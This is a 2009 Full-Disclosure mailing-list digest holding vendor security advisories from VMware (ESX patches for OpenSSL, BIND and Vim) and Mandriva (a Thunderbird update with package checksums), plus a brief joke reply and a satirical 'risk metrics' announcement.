From rjcamarero at gmail.com  Wed Apr  1 00:55:19 2009
From: rjcamarero at gmail.com (=?ISO-8859-1?Q?Rub=E9n_Camarero?=)
Date: Tue, 31 Mar 2009 19:55:19 -0400
Subject: [Full-disclosure] fooobar in source
In-Reply-To: <1238502835.19932.1.camel@tonu-laptop>
References: <1238502835.19932.1.camel@tonu-laptop>
Message-ID: <5e9568cb0903311655u2863d5ccu16c50810c8b63703@mail.gmail.com>

This list is not amused, Mr. Ballmer. Consequently, the trolls are now
asleep. Fuck them anyways.

On Tue, Mar 31, 2009 at 8:33 AM, Tonu Samuel <tonu at jes.ee> wrote:

> Hi!
>
> Not an exploit or bug but just another sample of making things
> difficult. Try to find out in HTML source where "foobar" comes from:
>
> http://www.digg.ee/xsl2.html
>
> Ignore other stuff on this host. Just happened to be logged in there
> when idea came :)
>
> Enjoy!
>
>  T?nu
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/




-- 
Rub?n Camarero
CCNA, CISSP
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090331/ce930d1e/attachment.html 

From security at vmware.com  Wed Apr  1 03:57:48 2009
From: security at vmware.com (VMware Security team)
Date: Tue, 31 Mar 2009 19:57:48 -0700
Subject: [Full-disclosure] VMSA-2009-0004 ESX Service Console updates for
 openssl, bind, and vim
Message-ID: <49D2D82C.3080904@vmware.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
                   VMware Security Advisory

Advisory ID:       VMSA-2009-0004
Synopsis:          ESX Service Console updates for openssl, bind, and
                   vim
Issue date:        2009-03-31
Updated on:        2009-03-31 (initial release of advisory)
CVE numbers:       CVE-2008-5077 CVE-2009-0025 CVE-2008-4101
                   CVE-2008-3432 CVE-2008-2712 CVE-2007-2953
- ------------------------------------------------------------------------

1. Summary

   ESX patches for OpenSSL, vim and bind resolve several security
   issues.

2. Relevant releases

   VMware ESX 3.0.3 without patches ESX303-200903406-SG,
                                    ESX303-200903405-SG,
                                    ESX303-200903403-SG

   VMware ESX 3.0.2 without patches ESX-1008409, ESX-1008408,
                                    ESX-1008406

   Extended support for ESX 3.0.2 Update 1 ends on 2009-08-08.
   Users should plan to upgrade to ESX 3.0.3 and preferably to
   the newest release available.

3. Problem Description

 a. Updated OpenSSL package for the Service Console fixes a
    security issue.

    OpenSSL 0.9.7a-33.24 and earlier does not properly check the return
    value from the EVP_VerifyFinal function, which could allow a remote
    attacker to bypass validation of the certificate chain via a
    malformed SSL/TLS signature for DSA and ECDSA keys.

    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the name CVE-2008-5077 to this issue.

    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.

    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected

    hosted *       any       any      not affected

    ESXi           3.5       ESXi     not affected

    ESX            3.5       ESX      affected, patch pending
    ESX            3.0.3     ESX      ESX303-200903406-SG
    ESX            3.0.2     ESX      ESX-1008409
    ESX            2.5.5     ESX      affected, patch pending

  * hosted products are VMware Workstation, Player, ACE, Server, Fusion.

 b. Update bind package for the Service Console fixes a security issue.

    A flaw was discovered in the way Berkeley Internet Name Domain
    (BIND) checked the return value of the OpenSSL DSA_do_verify
    function. On systems using DNSSEC, a malicious zone could present
    a malformed DSA certificate and bypass proper certificate
    validation, allowing spoofing attacks.

    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the name CVE-2009-0025 to this issue.

    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.

    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected

    hosted *       any       any      not affected

    ESXi           3.5       ESXi     not affected

    ESX            3.5       ESX      affected, patch pending
    ESX            3.0.3     ESX      ESX303-200903405-SG
    ESX            3.0.2     ESX      ESX-1008408
    ESX            2.5.5     ESX      affected, patch pending

  * hosted products are VMware Workstation, Player, ACE, Server, Fusion.

 c. Updated vim package for the Service Console addresses several
    security issues.

    Several input flaws were found in Visual editor IMproved's (Vim)
    keyword and tag handling. If Vim looked up a document's maliciously
    crafted tag or keyword, it was possible to execute arbitrary code as
    the user running Vim.

    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the name CVE-2008-4101 to this issue.

    A heap-based overflow flaw was discovered in Vim's expansion of file
    name patterns with shell wildcards. An attacker could create a
    specially crafted file or directory name, when opened by Vim causes
    the application to stop responding or execute arbitrary code.

    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the name CVE-2008-3432 to this issue.

    Several input flaws were found in various Vim system functions. If a
    user opened a specially crafted file, it was possible to execute
    arbitrary code as the user running Vim.

    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the name CVE-2008-2712 to this issue.

    A format string flaw was discovered in Vim's help tag processor. If
    a user was tricked into executing the "helptags" command on
    malicious data, arbitrary code could be executed with the
    permissions of the user running VIM.

    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the name CVE-2007-2953 to this issue.

    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.

    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected

    hosted *       any       any      not affected

    ESXi           3.5       ESXi     not affected

    ESX            3.5       ESX      affected, patch pending
    ESX            3.0.3     ESX      ESX303-200903403-SG
    ESX            3.0.2     ESX      ESX-1008406
    ESX            2.5.5     ESX      affected, patch pending

  * hosted products are VMware Workstation, Player, ACE, Server, Fusion.

4. Solution

   Please review the patch/release notes for your product and version
   and verify the md5sum of your downloaded file.

   ESX
   ---
   ESX 3.0.2 ESX-1008409 (openssl)
   http://download3.vmware.com/software/vi/ESX-1008409.tgz
   md5sum: cb25fd47bc0713b968d8778c033bc846
   http://kb.vmware.com/kb/1008409

   ESX 3.0.2 ESX-1008408 (bind)
   http://download3.vmware.com/software/vi/ESX-1008408.tgz
   md5sum: b6bd9193892a9c89b9b7a1e0456d2a9a
   http://kb.vmware.com/kb/1008408

   ESX 3.0.2 ESX-1008406 (vim)
   http://download3.vmware.com/software/vi/ESX-1008406.tgz
   md5sum: f069daa58190b39e431cedbd26ce25ef
   http://kb.vmware.com/kb/1008406

   ESX 3.0.3 ESX303-200903406-SG (openssl)
   http://download3.vmware.com/software/vi/ESX303-200903406-SG.zip
   md5sum: 45a2d32f9267deb5e743366c38652c92
   http://kb.vmware.com/kb/1008416

   ESX 3.0.3 ESX303-200903405-SG (bind)
   http://download3.vmware.com/software/vi/ESX303-200903405-SG.zip
   md5sum: 34d00fd9cca7f3e08c0857b4cc254710
   http://kb.vmware.com/kb/1008415

   ESX 3.0.3 ESX303-200903403-SG (vim)
   http://download3.vmware.com/software/vi/ESX303-200903403-SG.zip
   md5sum: 9790c9512aef18beaf0d1c7d405bed1a
   http://kb.vmware.com/kb/1008413

5. References

   CVE numbers
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5077
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0025
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4101
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3432
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2712
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2953

- ------------------------------------------------------------------------
6. Change log

2009-03-31  VMSA-2009-0004
Initial security advisory after release of patches for ESX 3.0.2 and
3.0.3 on 2009-03-31.

- -----------------------------------------------------------------------
7. Contact

E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

This Security Advisory is posted to the following lists:

  * security-announce at lists.vmware.com
  * bugtraq at securityfocus.com
  * full-disclosure at lists.grok.org.uk

E-mail:  security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055

VMware Security Center
http://www.vmware.com/security

VMware security response policy
http://www.vmware.com/support/policies/security_response.html

General support life cycle policy
http://www.vmware.com/support/policies/eos.html

VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html

Copyright 2009 VMware Inc.  All rights reserved.


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (MingW32)

iD8DBQFJ0tgoS2KysvBH1xkRAiAbAJ4uG0NGavdQLzfxFyXnrxBQLqHl1QCdEf4q
LA8+0sLvaS37smj8BQPdm0g=
=ZVXY
-----END PGP SIGNATURE-----



From sil at infiltrated.net  Wed Apr  1 03:58:46 2009
From: sil at infiltrated.net (J. Oquendo)
Date: Tue, 31 Mar 2009 21:58:46 -0500
Subject: [Full-disclosure] Introducing RMBSS - "Risk Metrics Budgetary
	Scoring System"
Message-ID: <20090401025846.GB89879@infiltrated.net>


Infiltrated Research Group is proud to introduce RMBSS "Risk Metrics
Budgetary Scoring System". A synergy of best practices frameworks
that synchronizes industry known security frameworks for more
thorough Risk Assessments and Analysis. The concept was born out
of the need for Information Security Managers (CSO's/CIO's/CISO's)
to realize value added security metrics. While our initial version is in its
preliminary stages, we're confident that our improved methods of
security correlation events in an architecture will guarantee proven
actionable security results. 


Infiltrated Research Group

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP

"Enough research will tend to support your
conclusions." - Arthur Bloch

"A conclusion is the place where you got
tired of thinking" - Arthur Bloch

227C 5D35 7DCB 0893 95AA  4771 1DCE 1FD1 5CCD 6B5E
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x5CCD6B5E



From security at mandriva.com  Wed Apr  1 13:40:01 2009
From: security at mandriva.com (security at mandriva.com)
Date: Wed, 01 Apr 2009 14:40:01 +0200
Subject: [Full-disclosure] [ MDVSA-2009:083 ] mozilla-thunderbird
Message-ID: <E1Lozjd-0004zx-9q@titan.mandriva.com>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:083
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : mozilla-thunderbird
 Date    : April 1, 2009
 Affected: 2008.1, 2009.0, Corporate 3.0
 _______________________________________________________________________

 Problem Description:

 A number of security vulnerabilities have been discovered in previous
 versions, and corrected in the latest Mozilla Thunderbird program,
 version 2.0.0.21 (CVE-2009-0040, CVE-2009-0776, CVE-2009-0771,
 CVE-2009-0772, CVE-2009-0773, CVE-2009-0774, CVE-2009-0352,
 CVE-2009-0353).
 
 This update provides the latest Thunderbird to correct these issues.
 
 Additionaly, Mozilla Thunderbird released with Mandriva Linux 2009.0,
 when used with Enigmail extension on x86_64 architechture, would freeze
 whenever any Enigmail function was used (bug #45001). Also, when used
 on i586 architecture, Thunderbird would crash when sending an email,
 if a file with an unknown extension was attached to it. (bug #46107)
 
 This update also fixes those issues.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0040
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0352
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0353
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0771
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0772
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0773
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0774
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0776
 http://www.mozilla.org/security/known-vulnerabilities/thunderbird20.html#thunderbird2.0.0.21
 https://qa.mandriva.com/45001
 https://qa.mandriva.com/46107
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.1:
 0d3f7b629be78c12d4fc6f5355b550c8  2008.1/i586/beagle-0.3.3-7.3mdv2008.1.i586.rpm
 27ffc999daca1df307fe6ea9574ef916  2008.1/i586/beagle-crawl-system-0.3.3-7.3mdv2008.1.i586.rpm
 11149f3ed11d0fe455346080b81aad0f  2008.1/i586/beagle-doc-0.3.3-7.3mdv2008.1.i586.rpm
 e0e87a256a781acf992bbf4f11a8d91d  2008.1/i586/beagle-epiphany-0.3.3-7.3mdv2008.1.i586.rpm
 208c0ed7d57cf1bfa23920fca82eaf9f  2008.1/i586/beagle-evolution-0.3.3-7.3mdv2008.1.i586.rpm
 f79d56797302b8c568e85c697997e078  2008.1/i586/beagle-gui-0.3.3-7.3mdv2008.1.i586.rpm
 ae5bf3c55cad30d2f650adbfb9700338  2008.1/i586/mozilla-firefox-ext-beagle-0.3.3-7.3mdv2008.1.i586.rpm
 55d87c1252beb5fabcc4a5945cf417f6  2008.1/i586/mozilla-thunderbird-2.0.0.21-0.1mdv2008.1.i586.rpm
 f2dd5cfababf94796b18cb92ff9e0a07  2008.1/i586/mozilla-thunderbird-af-2.0.0.21-0.1mdv2008.1.i586.rpm
 1ab80e77befc46a5a42d2f0e52c08e57  2008.1/i586/mozilla-thunderbird-be-2.0.0.21-0.1mdv2008.1.i586.rpm
 1bcfc3437283c8474f466690c05e29b7  2008.1/i586/mozilla-thunderbird-beagle-0.3.3-7.3mdv2008.1.i586.rpm
 ec1d95fb0ef9d43cd91034d1b9388307  2008.1/i586/mozilla-thunderbird-bg-2.0.0.21-0.1mdv2008.1.i586.rpm
 431369d1da3c1d00ac4d8921bd17ca7a  2008.1/i586/mozilla-thunderbird-ca-2.0.0.21-0.1mdv2008.1.i586.rpm
 5f70743b9fe719939d748fa80ffa0767  2008.1/i586/mozilla-thunderbird-cs-2.0.0.21-0.1mdv2008.1.i586.rpm
 449194e97635699c3ff1277f467ed24c  2008.1/i586/mozilla-thunderbird-da-2.0.0.21-0.1mdv2008.1.i586.rpm
 d6c91473c245609a91e89463c4615ba3  2008.1/i586/mozilla-thunderbird-de-2.0.0.21-0.1mdv2008.1.i586.rpm
 220389f80b81795ebb577ad946390732  2008.1/i586/mozilla-thunderbird-devel-2.0.0.21-0.1mdv2008.1.i586.rpm
 9fb070335fc8fee3a17d96cf25ff66a9  2008.1/i586/mozilla-thunderbird-el-2.0.0.21-0.1mdv2008.1.i586.rpm
 8a4ae47f5b01ecb9566c3c607fcc0bc4  2008.1/i586/mozilla-thunderbird-en_GB-2.0.0.21-0.1mdv2008.1.i586.rpm
 592d102cd557a7f15cca4604c0407250  2008.1/i586/mozilla-thunderbird-enigmail-2.0.0.21-0.1mdv2008.1.i586.rpm
 8f8321539f4a1e406c0998185fc47629  2008.1/i586/mozilla-thunderbird-enigmail-ar-2.0.0.21-0.1mdv2008.1.i586.rpm
 59e57d53eb5ffb654e25daa023431878  2008.1/i586/mozilla-thunderbird-enigmail-ca-2.0.0.21-0.1mdv2008.1.i586.rpm
 e71d177dba8b7be353bc983e50ea25e9  2008.1/i586/mozilla-thunderbird-enigmail-cs-2.0.0.21-0.1mdv2008.1.i586.rpm
 894bd6dde897996782ff87d154f268b6  2008.1/i586/mozilla-thunderbird-enigmail-de-2.0.0.21-0.1mdv2008.1.i586.rpm
 f59d1fb247620c12c7cea60314cee23f  2008.1/i586/mozilla-thunderbird-enigmail-el-2.0.0.21-0.1mdv2008.1.i586.rpm
 46dcf53ebb559fb40fe5c114681d4986  2008.1/i586/mozilla-thunderbird-enigmail-es-2.0.0.21-0.1mdv2008.1.i586.rpm
 ec45d2a44295c39546d752d826fc8db4  2008.1/i586/mozilla-thunderbird-enigmail-es_AR-2.0.0.21-0.1mdv2008.1.i586.rpm
 f6db010139b5328f0c036c517c48496f  2008.1/i586/mozilla-thunderbird-enigmail-fi-2.0.0.21-0.1mdv2008.1.i586.rpm
 dcb4aa50a0aa5cf451999d51d6368229  2008.1/i586/mozilla-thunderbird-enigmail-fr-2.0.0.21-0.1mdv2008.1.i586.rpm
 5c1cacae7570fcf594ded598c9e33d59  2008.1/i586/mozilla-thunderbird-enigmail-hu-2.0.0.21-0.1mdv2008.1.i586.rpm
 310349a620cf8972fc3ee31e4dc53adf  2008.1/i586/mozilla-thunderbird-enigmail-it-2.0.0.21-0.1mdv2008.1.i586.rpm
 cdc187ec9b4416fe24bfd9229470b38d  2008.1/i586/mozilla-thunderbird-enigmail-ja-2.0.0.21-0.1mdv2008.1.i586.rpm
 f409e267bcafbadea60f490958017d50  2008.1/i586/mozilla-thunderbird-enigmail-ko-2.0.0.21-0.1mdv2008.1.i586.rpm
 ed75fca29f763f0b054597016e4fe715  2008.1/i586/mozilla-thunderbird-enigmail-nb-2.0.0.21-0.1mdv2008.1.i586.rpm
 86670b84e1fb13700104465af751ff95  2008.1/i586/mozilla-thunderbird-enigmail-nl-2.0.0.21-0.1mdv2008.1.i586.rpm
 a5b31185a6f14e7e8df1a356aa377c73  2008.1/i586/mozilla-thunderbird-enigmail-pl-2.0.0.21-0.1mdv2008.1.i586.rpm
 c727d05ab7f60c440664705cbacf015f  2008.1/i586/mozilla-thunderbird-enigmail-pt-2.0.0.21-0.1mdv2008.1.i586.rpm
 0e5021c95f645af59dc2922241c68f01  2008.1/i586/mozilla-thunderbird-enigmail-pt_BR-2.0.0.21-0.1mdv2008.1.i586.rpm
 98255e5932435e19976ace18bf7d89b3  2008.1/i586/mozilla-thunderbird-enigmail-ro-2.0.0.21-0.1mdv2008.1.i586.rpm
 504181d7d6a2526451744ca069b0e754  2008.1/i586/mozilla-thunderbird-enigmail-ru-2.0.0.21-0.1mdv2008.1.i586.rpm
 70fd907a9b02a50997d3211d07451e99  2008.1/i586/mozilla-thunderbird-enigmail-sk-2.0.0.21-0.1mdv2008.1.i586.rpm
 3acdbcf44fdac5a96556872e1ca59496  2008.1/i586/mozilla-thunderbird-enigmail-sl-2.0.0.21-0.1mdv2008.1.i586.rpm
 1980106e98c9c1a0dbfcdda6bd4e2fb0  2008.1/i586/mozilla-thunderbird-enigmail-sv-2.0.0.21-0.1mdv2008.1.i586.rpm
 1463bf0fbb8d50022c43425fb5220c72  2008.1/i586/mozilla-thunderbird-enigmail-tr-2.0.0.21-0.1mdv2008.1.i586.rpm
 ecce0b46d5e8b242753cc6d7f46ad130  2008.1/i586/mozilla-thunderbird-enigmail-zh_CN-2.0.0.21-0.1mdv2008.1.i586.rpm
 cc4ceea00d28d151abeed09ba402fbb6  2008.1/i586/mozilla-thunderbird-enigmail-zh_TW-2.0.0.21-0.1mdv2008.1.i586.rpm
 93ff18443248c81b7a9b26a6f664b962  2008.1/i586/mozilla-thunderbird-es_AR-2.0.0.21-0.1mdv2008.1.i586.rpm
 f2560527459a252713ce712f11582dd8  2008.1/i586/mozilla-thunderbird-es_ES-2.0.0.21-0.1mdv2008.1.i586.rpm
 ccbdfb0c723d5d7f795eee409dd3a001  2008.1/i586/mozilla-thunderbird-et_EE-2.0.0.21-0.1mdv2008.1.i586.rpm
 da68a92d19988d723bb5767d667cfd1d  2008.1/i586/mozilla-thunderbird-eu-2.0.0.21-0.1mdv2008.1.i586.rpm
 abc864500f7940c0ecddcecfbb941b53  2008.1/i586/mozilla-thunderbird-fi-2.0.0.21-0.1mdv2008.1.i586.rpm
 d659e2f72f379f72492cee61e8cbf4d3  2008.1/i586/mozilla-thunderbird-fr-2.0.0.21-0.1mdv2008.1.i586.rpm
 2ca7d4b79ff2b130fe1f9611a1cb07aa  2008.1/i586/mozilla-thunderbird-ga-2.0.0.21-0.1mdv2008.1.i586.rpm
 25ce7e15f61762509866d6e4733929c0  2008.1/i586/mozilla-thunderbird-gu_IN-2.0.0.21-0.1mdv2008.1.i586.rpm
 30b366cd03dbcff9a7cc80af310b2f64  2008.1/i586/mozilla-thunderbird-he-2.0.0.21-0.1mdv2008.1.i586.rpm
 d5befdde45e91c4426fb89b4f4b0bd9a  2008.1/i586/mozilla-thunderbird-hu-2.0.0.21-0.1mdv2008.1.i586.rpm
 1030b63da7ad800f82ff15b7765bd927  2008.1/i586/mozilla-thunderbird-it-2.0.0.21-0.1mdv2008.1.i586.rpm
 044a060db32c45f3c2fd76db1d2bde73  2008.1/i586/mozilla-thunderbird-ja-2.0.0.21-0.1mdv2008.1.i586.rpm
 4d23d122c5a1c3293488551a097d7301  2008.1/i586/mozilla-thunderbird-ko-2.0.0.21-0.1mdv2008.1.i586.rpm
 9bc6a3207b1a4b84fadb7854a27ca955  2008.1/i586/mozilla-thunderbird-lt-2.0.0.21-0.1mdv2008.1.i586.rpm
 5de105775e9606c85a31514e28a6b346  2008.1/i586/mozilla-thunderbird-mk-2.0.0.21-0.1mdv2008.1.i586.rpm
 53ea7505921fd3b2944dfce626cc166c  2008.1/i586/mozilla-thunderbird-moztraybiff-1.2.3-4.5mdv2008.1.i586.rpm
 517eed044751c7a6d7f3156215b17b2c  2008.1/i586/mozilla-thunderbird-nb_NO-2.0.0.21-0.1mdv2008.1.i586.rpm
 c859005aa3be0069c77615d607821e19  2008.1/i586/mozilla-thunderbird-nl-2.0.0.21-0.1mdv2008.1.i586.rpm
 43db1c4a0ec6a85a4830cb1768b801a0  2008.1/i586/mozilla-thunderbird-nn_NO-2.0.0.21-0.1mdv2008.1.i586.rpm
 84aad0a32f3f48231a6eaa083b092ad3  2008.1/i586/mozilla-thunderbird-pa_IN-2.0.0.21-0.1mdv2008.1.i586.rpm
 6a550abaa2893bd7173420cca17153bd  2008.1/i586/mozilla-thunderbird-pl-2.0.0.21-0.1mdv2008.1.i586.rpm
 a6fd8624f0f5e89bc9fc31a1d75fb8a9  2008.1/i586/mozilla-thunderbird-pt_BR-2.0.0.21-0.1mdv2008.1.i586.rpm
 a30eaca7fa400d6bc97ac808dbcad075  2008.1/i586/mozilla-thunderbird-pt_PT-2.0.0.21-0.1mdv2008.1.i586.rpm
 3f647442414ed39055f542a17c70d79f  2008.1/i586/mozilla-thunderbird-ru-2.0.0.21-0.1mdv2008.1.i586.rpm
 ce8b82069f13091379fea4af38aff03e  2008.1/i586/mozilla-thunderbird-sk-2.0.0.21-0.1mdv2008.1.i586.rpm
 7108bc7f1b399dd5820261631349f3aa  2008.1/i586/mozilla-thunderbird-sl-2.0.0.21-0.1mdv2008.1.i586.rpm
 2bab1d71d578417aaeb5fd92fbce099e  2008.1/i586/mozilla-thunderbird-sv_SE-2.0.0.21-0.1mdv2008.1.i586.rpm
 43697cee528cf110ede1fd91a7720cb7  2008.1/i586/mozilla-thunderbird-tr-2.0.0.21-0.1mdv2008.1.i586.rpm
 55f24996d5233a57d5383a4ce2ce5f7d  2008.1/i586/mozilla-thunderbird-uk-2.0.0.21-0.1mdv2008.1.i586.rpm
 5459da15126a9c2fd720b6110264a9ca  2008.1/i586/mozilla-thunderbird-zh_CN-2.0.0.21-0.1mdv2008.1.i586.rpm
 a92f9c0ffe26b8b8e2b7e40c1a22380d  2008.1/i586/mozilla-thunderbird-zh_TW-2.0.0.21-0.1mdv2008.1.i586.rpm
 edcfd7b1c83b99b6591297cea6b56bdf  2008.1/i586/nsinstall-2.0.0.21-0.1mdv2008.1.i586.rpm 
 b1a3a4869b3b969924e1e9719179adf0  2008.1/SRPMS/beagle-0.3.3-7.3mdv2008.1.src.rpm
 56a027d87b2f062923541364d2596f7b  2008.1/SRPMS/mozilla-thunderbird-2.0.0.21-0.1mdv2008.1.src.rpm
 caad8a5d4126e0d3debbb0ae1ec05249  2008.1/SRPMS/mozilla-thunderbird-enigmail-l10n-2.0.0.21-0.1mdv2008.1.src.rpm
 7e919606f3e7f51d9e1b9c390fe8af1d  2008.1/SRPMS/mozilla-thunderbird-l10n-2.0.0.21-0.1mdv2008.1.src.rpm
 e677b10ed572757b7e3dfc314eb88233  2008.1/SRPMS/mozilla-thunderbird-moztraybiff-1.2.3-4.5mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 3d44bdfbcc0b1b914dfa1424e0ff28ce  2008.1/x86_64/beagle-0.3.3-7.3mdv2008.1.x86_64.rpm
 3aeb196f03d1986e2b944586e80b754b  2008.1/x86_64/beagle-crawl-system-0.3.3-7.3mdv2008.1.x86_64.rpm
 8c30f0b0418eb7bed76b36c5bec119b1  2008.1/x86_64/beagle-doc-0.3.3-7.3mdv2008.1.x86_64.rpm
 841b052758969bd22b2773a00bfbdef8  2008.1/x86_64/beagle-epiphany-0.3.3-7.3mdv2008.1.x86_64.rpm
 3e4992cb2df1a1270b36059e26cf8ed8  2008.1/x86_64/beagle-evolution-0.3.3-7.3mdv2008.1.x86_64.rpm
 df6ddf00230516bd25ee5130bb711217  2008.1/x86_64/beagle-gui-0.3.3-7.3mdv2008.1.x86_64.rpm
 8005991ac286d8fb504fd6d166596d87  2008.1/x86_64/mozilla-firefox-ext-beagle-0.3.3-7.3mdv2008.1.x86_64.rpm
 2d609c0649234b060ad58a1e998079c8  2008.1/x86_64/mozilla-thunderbird-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 5195d2994e8de22afbd1813907861d2c  2008.1/x86_64/mozilla-thunderbird-af-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 898030f143a81f927fdb17f04d5ad351  2008.1/x86_64/mozilla-thunderbird-be-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 6a039dd220ffdcca7251a694b443480c  2008.1/x86_64/mozilla-thunderbird-beagle-0.3.3-7.3mdv2008.1.x86_64.rpm
 b123a7c8d4086abf2aef60caa898f962  2008.1/x86_64/mozilla-thunderbird-bg-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 855c37f133236021dc477faf0d91dd9c  2008.1/x86_64/mozilla-thunderbird-ca-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 6ab26085c07f9337e613d87cd78932f1  2008.1/x86_64/mozilla-thunderbird-cs-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 567af6017229a908e4a08df9ad98a775  2008.1/x86_64/mozilla-thunderbird-da-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 dcef8b33cf37a3f7e57c58e8d0371ef3  2008.1/x86_64/mozilla-thunderbird-de-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 c39c8ed01be9828f1236c8805b8368d5  2008.1/x86_64/mozilla-thunderbird-devel-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 4511e9698b24f856c1e9a01241b80dda  2008.1/x86_64/mozilla-thunderbird-el-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 0e5848e0e56bfd5f60582d3d700d742f  2008.1/x86_64/mozilla-thunderbird-en_GB-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 37f2e5929abc91a8e0bbfffa9e3cbdd3  2008.1/x86_64/mozilla-thunderbird-enigmail-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 24d606145ca626f6761048c29af23896  2008.1/x86_64/mozilla-thunderbird-enigmail-ar-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 2332f2deba5583611a928d63f8a1438d  2008.1/x86_64/mozilla-thunderbird-enigmail-ca-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 ec58ea5c98290a2e9cba360a0709ae1d  2008.1/x86_64/mozilla-thunderbird-enigmail-cs-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 a34ec63a2c04deb264dfbd393e8b2016  2008.1/x86_64/mozilla-thunderbird-enigmail-de-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 ba2c5a9793dd997198eaf97a0158c96f  2008.1/x86_64/mozilla-thunderbird-enigmail-el-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 67fcf87b17d842c25bfeaa6429d06852  2008.1/x86_64/mozilla-thunderbird-enigmail-es-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 d325e56cc50c93ce755e6b20f67f534e  2008.1/x86_64/mozilla-thunderbird-enigmail-es_AR-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 269dad9c9b39f0940a09055bdaccc7e1  2008.1/x86_64/mozilla-thunderbird-enigmail-fi-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 acb310ce64c9c1bed93b2a6531e35cb9  2008.1/x86_64/mozilla-thunderbird-enigmail-fr-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 9f58365eb2ac82e732cc43e7519384f6  2008.1/x86_64/mozilla-thunderbird-enigmail-hu-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 b68356ab9489b2099f7bac27c0665e71  2008.1/x86_64/mozilla-thunderbird-enigmail-it-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 99e61f0b1c62912bc2b99e179237055d  2008.1/x86_64/mozilla-thunderbird-enigmail-ja-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 fa60820dff640ab2def6b3d0ebea1b68  2008.1/x86_64/mozilla-thunderbird-enigmail-ko-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 553b3b7928c86203b5f9947468904c42  2008.1/x86_64/mozilla-thunderbird-enigmail-nb-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 43837a3a140665e7da95fe87f29ae9e2  2008.1/x86_64/mozilla-thunderbird-enigmail-nl-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 9c7413513f8b8781175c22f43ecbeba5  2008.1/x86_64/mozilla-thunderbird-enigmail-pl-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 f13dad2945a76223f198b2e5b3984193  2008.1/x86_64/mozilla-thunderbird-enigmail-pt-2.0.0.21-0.1mdv2008.1.x86_64.rpm
 9304d751d161bd1604c49ac34d5912ca  2008.1/x86_64/mozilla-thunderbird-enigmail-pt_BR-2.0.0.21-0.1mdv2008.1.x86_64.rpm
